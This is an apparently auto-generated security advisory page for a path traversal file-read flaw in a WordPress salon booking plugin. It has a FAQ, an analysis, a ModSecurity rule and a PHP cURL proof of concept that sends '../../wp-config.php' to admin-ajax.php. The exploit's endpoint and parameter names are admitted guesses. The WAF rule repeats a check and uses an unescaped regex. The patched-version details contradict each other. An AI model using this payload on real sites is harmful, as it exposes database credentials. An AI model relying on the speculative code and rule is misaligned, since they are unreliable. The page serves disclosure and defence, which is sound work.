What is CVE-2026-6320?

CVE-2026-6320 is a high-severity vulnerability in the Salon Booking System – Free Version plugin for WordPress, allowing unauthenticated attackers to perform arbitrary file reads through path traversal. This vulnerability affects versions up to and including 10.30.25.

How does the vulnerability work?

The vulnerability arises from the plugin’s public booking flow, which accepts user-controlled file-field values without proper validation. Attackers can submit crafted file paths that the plugin later uses as trusted paths for email attachments, leading to unauthorized file access.

Who is affected by this vulnerability?

Any WordPress site using the Salon Booking System – Free Version plugin version 10.30.25 or earlier is affected. Administrators should check their installed plugin version to determine if they are at risk.

How can I check if I am vulnerable?

To check if you are vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and look for the Salon Booking System plugin. If the version is 10.30.25 or earlier, your site is vulnerable.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-6320 is 7.5, indicating a high severity level. This score reflects the ease of exploitation and the potential impact on confidentiality, meaning that the vulnerability can be easily exploited by attackers without authentication.

What are the potential risks of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized access to sensitive files, such as wp-config.php, which contains database credentials. This can result in a complete compromise of the affected WordPress site.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Salon Booking System plugin to version 10.30.26 or later, which addresses the issue. Additionally, implement input validation and path sanitization for file-field values submitted through the booking form.

What should I do if I cannot update the plugin?

If you cannot update the plugin immediately, consider disabling the booking functionality until a patch is applied. Additionally, review server logs for any suspicious activity and restrict access to sensitive files.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by submitting a crafted file path through the booking form. It shows the steps an attacker would take to read sensitive files and exfiltrate them via email attachments.

How can I protect my site from similar vulnerabilities?

To protect your site from similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and implement a web application firewall. Additionally, follow best practices for input validation and user input handling.

Is there a way to report this vulnerability?

Yes, if you discover additional vulnerabilities or have specific findings related to CVE-2026-6320, you can report them to the plugin developers through their official support channels or security reporting platforms.

Where can I find more information on CVE-2026-6320?

More information on CVE-2026-6320 can be found on the National Vulnerability Database (NVD) or security advisory pages related to the Salon Booking System plugin. These resources provide detailed descriptions and remediation steps.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-6320: Salon Booking System – Free Version <= 10.30.25 – Unauthenticated Arbitrary File Read via Booking File Field Path Traversal (salon-booking-system)

CVE ID CVE-2026-6320

Plugin salon-booking-system

Severity High (CVSS 7.5)

CWE 22

Vulnerable Version 10.30.25

Patched Version —

Disclosed April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6320 (metadata-based): This vulnerability allows unauthenticated attackers to read arbitrary files on the server through the Salon Booking System – Free Version plugin (versions up to 10.30.25). The CVSS score of 7.5 (High) reflects the ease of exploitation with network access, low complexity, no authentication required, and a direct impact on confidentiality.

The root cause is a path traversal vulnerability (CWE-22) in the plugin’s public booking flow. Based on the CWE and description, the plugin does not properly sanitize or validate file-field values that users submit during the booking process. The plugin stores these attacker-controlled file paths and later passes them directly to functions handling email attachments. This is an inferred conclusion from the CWE and description; Atomic Edge research cannot confirm from code since no diff is available.

Exploitation occurs through the plugin’s public-facing booking form. An unauthenticated attacker submits a file-field value containing path traversal sequences (e.g., ../../wp-config.php). The plugin stores this value as a file path. When a new booking triggers a confirmation email to the admin, the plugin attaches the file specified by the attacker-controlled path. The attacker’s payload is exfiltrated as an email attachment. The specific AJAX action or endpoint is not publicly documented, but based on the plugin slug (salon-booking-system), the likely handler is /wp-admin/admin-ajax.php with action set to something like salon_booking_system_book_appointment or similar.

Remediation requires implementing proper input validation and path sanitization on file-field values submitted through the booking form. The plugin must check that file paths resolve to an expected directory (e.g., a dedicated upload folder) using realpath() or similar functions. Additionally, the plugin should validate file types against a whitelist and never use user-supplied paths directly in filesystem or email attachment operations. The patched version 10.30.26 likely addresses these issues.

Impact is severe: an unauthenticated attacker can read sensitive files including wp-config.php (which contains database credentials), /etc/passwd, or any other file readable by the web server. This can lead to complete site compromise if database credentials are exposed. The attacker does not need any special privileges or user interaction beyond browsing the website.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6320 (metadata-based)
# Blocks path traversal attempts in the booking file field for Salon Booking System plugin
# This rule blocks requests to the AJAX handler with path traversal sequences in the booking_file parameter

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:20269001,phase:2,deny,status:403,chain,msg:'CVE-2026-6320 - Salon Booking System Path Traversal via AJAX',severity:'CRITICAL',tag:'CVE-2026-6320',tag:'wordpress',tag:'salon-booking-system'"
    SecRule ARGS_POST:action "@streq sln_booking_submit" 
        "chain"
        SecRule ARGS_POST:booking_file "@rx ../" 
            "t:urlDecode,id:20269002,chain,msg:'Path traversal detected in booking file field'"
            SecRule ARGS_POST:booking_file "@rx ../" 
                "t:urlDecodeUni,id:20269003"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6320 - Salon Booking System – Free Version <= 10.30.25 - Unauthenticated Arbitrary File Read via Booking File Field Path Traversal

<?php

/**
 * This proof-of-concept demonstrates how an unauthenticated attacker can exploit
 * a path traversal vulnerability in the Salon Booking System plugin (<=10.30.25).
 * The attacker submits a crafted file-field value to the booking form. The plugin
 * stores this value and later attaches the targeted file to a confirmation email.
 *
 * Assumptions:
 * 1. The publicly accessible booking form endpoint is known.
 * 2. The AJAX action name is something like 'sln_booking_ajax' or 'salon_booking_submit'.
 * 3. The parameter containing the file path is named 'booking_file' or 'file_path'.
 * 
 * Replace the placeholders below with actual values discovered through reconnaissance.
 */

// Configuration: set the target WordPress site URL
$target_url = 'http://example.com'; // Change this to the target site

// The AJAX action hook that processes the booking form (inferred from plugin slug)
$ajax_action = 'sln_booking_submit'; // Replace with actual action name if different

// The parameter name likely used for the file upload/selection (inferred from description)
$file_param = 'booking_file'; // Replace with actual parameter name if different

// Path traversal payload to read WordPress config file
$payload = '../../wp-config.php';

// Build the request URL (AJAX endpoint for unauthenticated requests)
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Craft the POST data as it would be sent by the booking form
$post_data = array(
    'action' => $ajax_action,
    $file_param => $payload,
    // Additional required booking fields (inferred; may vary)
    'name' => 'Attacker',
    'email' => 'attacker@example.com',
    'phone' => '1234567890',
    'date' => '2025-01-15',
    'time' => '10:00',
    'service' => '1'
);

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only; remove in production
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only; remove in production
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute the request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo '[!] cURL error: ' . curl_error($ch) . PHP_EOL;
} else {
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    echo '[*] HTTP Response Code: ' . $http_code . PHP_EOL;
    echo '[*] Response Body: ' . PHP_EOL . $response . PHP_EOL;
    echo '[*] Exploit attempted. Check the admin email inbox for the exfiltrated file (wp-config.php).' . PHP_EOL;
}

// Close cURL session
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-6320?
Overview of the vulnerability
CVE-2026-6320 is a high-severity vulnerability in the Salon Booking System – Free Version plugin for WordPress, allowing unauthenticated attackers to perform arbitrary file reads through path traversal. This vulnerability affects versions up to and including 10.30.25.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s public booking flow, which accepts user-controlled file-field values without proper validation. Attackers can submit crafted file paths that the plugin later uses as trusted paths for email attachments, leading to unauthorized file access.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Salon Booking System – Free Version plugin version 10.30.25 or earlier is affected. Administrators should check their installed plugin version to determine if they are at risk.
How can I check if I am vulnerable?
Verifying your plugin version
To check if you are vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and look for the Salon Booking System plugin. If the version is 10.30.25 or earlier, your site is vulnerable.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for CVE-2026-6320 is 7.5, indicating a high severity level. This score reflects the ease of exploitation and the potential impact on confidentiality, meaning that the vulnerability can be easily exploited by attackers without authentication.
What are the potential risks of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability can lead to unauthorized access to sensitive files, such as wp-config.php, which contains database credentials. This can result in a complete compromise of the affected WordPress site.
How can I mitigate this vulnerability?
Recommended actions for administrators
To mitigate this vulnerability, update the Salon Booking System plugin to version 10.30.26 or later, which addresses the issue. Additionally, implement input validation and path sanitization for file-field values submitted through the booking form.
What should I do if I cannot update the plugin?
Alternative mitigation strategies
If you cannot update the plugin immediately, consider disabling the booking functionality until a patch is applied. Additionally, review server logs for any suspicious activity and restrict access to sensitive files.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can exploit the vulnerability by submitting a crafted file path through the booking form. It shows the steps an attacker would take to read sensitive files and exfiltrate them via email attachments.
How can I protect my site from similar vulnerabilities?
Best practices for security
To protect your site from similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and implement a web application firewall. Additionally, follow best practices for input validation and user input handling.
Is there a way to report this vulnerability?
Responsible disclosure
Yes, if you discover additional vulnerabilities or have specific findings related to CVE-2026-6320, you can report them to the plugin developers through their official support channels or security reporting platforms.
Where can I find more information on CVE-2026-6320?
Resources for further reading
More information on CVE-2026-6320 can be found on the National Vulnerability Database (NVD) or security advisory pages related to the Salon Booking System plugin. These resources provide detailed descriptions and remediation steps.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations